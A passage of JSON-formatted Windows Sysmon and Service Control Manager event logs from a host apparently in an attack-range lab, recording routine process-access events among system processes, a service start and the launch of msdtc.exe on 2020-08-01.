06:51:21.451","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-10E9-5F25-0000-001068150500}","TargetProcessId":"1280","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3004,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:21.451\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nSourceProcessId: 852\r\nSourceThreadId: 1116\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {E2A3D6B1-10E9-5F25-0000-001068150500}\r\nTargetProcessId: 1280\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:21.451","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","SourceProcessId":"852","SourceThreadId":"1116","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{E2A3D6B1-10E9-5F25-0000-001068150500}","TargetProcessId":"1280","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76848,"ProcessID":852,"ThreadID":1116,"Channel":"System","Message":"The MapsBroker service entered the running state.","param1":"MapsBroker","param2":"running","EventReceivedTime":"2020-08-01 06:51:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3005,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:21.592\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 988\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nTargetProcessId: 852\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:21.592","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"988","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","TargetProcessId":"852","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3006,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:21.592\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:21.592","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3007,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:21.592\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:21.592","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3008,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:21.596\r\nProcessGuid: {E2A3D6B1-10E9-5F25-0000-001091170500}\r\nProcessId: 3364\r\nImage: C:\\Windows\\System32\\msdtc.exe\r\nFileVersion: 2001.12.10941.16384 (rs1_release.160715-1616)\r\nDescription: Microsoft Distributed Transaction Coordinator Service\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: MSDTC.EXE\r\nCommandLine: C:\\Windows\\System32\\msdtc.exe\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\NETWORK SERVICE\r\nLogonGuid: {E2A3D6B1-105A-5F25-0000-0020E4030000}\r\nLogonId: 0x3E4\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=308F08347923DEEDE7BC03EC7D485841,SHA256=72DB45CA11FE635DF9F8273C38CBEFB8DF5362ADA0CBF6D2B1E570365DC700C0,IMPHASH=D02F3DF332409C5D3F34BA2D38FC4ED4\r\nParentProcessGuid: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nParentProcessId: 852\r\nParentImage: C:\\Windows\\System32\\services.exe\r\nParentCommandLine: C:\\Windows\\system32\\services.exe","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:21.596","ProcessGuid":"{E2A3D6B1-10E9-5F25-0000-001091170500}","Image":"C:\\Windows\\System32\\msdtc.exe","FileVersion":"2001.12.10941.16384 (rs1_release.160715-1616)","Description":"Microsoft Distributed Transaction Coordinator Service","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"MSDTC.EXE","CommandLine":"C:\\Windows\\System32\\msdtc.exe","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\NETWORK SERVICE","LogonGuid":"{E2A3D6B1-105A-5F25-0000-0020E4030000}","LogonId":"0x3e4","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=308F08347923DEEDE7BC03EC7D485841,SHA256=72DB45CA11FE635DF9F8273C38CBEFB8DF5362ADA0CBF6D2B1E570365DC700C0,IMPHASH=D02F3DF332409C5D3F34BA2D38FC4ED4","ParentProcessGuid":"{E2A3D6B1-1058-5F25-0000-001030530000}","ParentProcessId":"852","ParentImage":"C:\\Windows\\System32\\services.exe","ParentCommandLine":"C:\\Windows\\system32\\services.exe","EventReceivedTime":"2020-08-01 06:51:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3009,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:21.592\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nSourceProcessId: 852\r\nSourceThreadId: 940\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {E2A3D6B1-10E9-5F25-0000-001091170500}\r\nTargetProcessId: 3364\r\nTargetImage: C:\\Windows\\System32\\msdtc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+316d|C:\\Windows\\SYSTEM32\\ntdll.dll+7f70d|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+29c02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:21.592","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","SourceProcessId":"852","SourceThreadId":"940","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{E2A3D6B1-10E9-5F25-0000-001091170500}","TargetProcessId":"3364","TargetImage":"C:\\Windows\\System32\\msdtc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+316d|C:\\Windows\\SYSTEM32\\ntdll.dll+7f70d|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+29c02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3010,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:21.592\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-10E9-5F25-0000-001091170500}\r\nTargetProcessId: 3364\r\nTargetImage: C:\\Windows\\System32\\msdtc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:21.592","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-10E9-5F25-0000-001091170500}","TargetProcessId":"3364","TargetImage":"C:\\Windows\\System32\\msdtc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3011,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:21.592\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:21.592","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3012,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:21.592\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 